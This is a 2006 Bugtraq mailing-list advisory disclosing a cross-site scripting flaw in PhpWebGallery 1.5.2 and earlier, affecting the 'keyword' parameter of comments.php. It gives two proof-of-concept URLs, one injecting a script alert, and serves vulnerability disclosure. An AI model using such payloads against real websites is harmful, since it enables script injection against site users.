Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

PhpWebGallery Cross Site Scripting Vulnerability

From: iss4m.h () gmail com
Date: 4 Jul 2006 00:00:03 -0000
Produce : PhpWebGallery <= 1.5.2
Site    : http://www.phpwebgallery.net
Problem : XSS
Greetz  : hasnaa and all friends

Moroccan Security Research Team

Vulnerable file : comments.php

Exploit :

http://localhost/phpwebgallery/comments.php?keyword=%22%3E[XSS]

http://localhost/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C/script%3E

Contact  : iss4m.h () gmail com
Previous By Date Next
Previous By Thread Next

Current thread: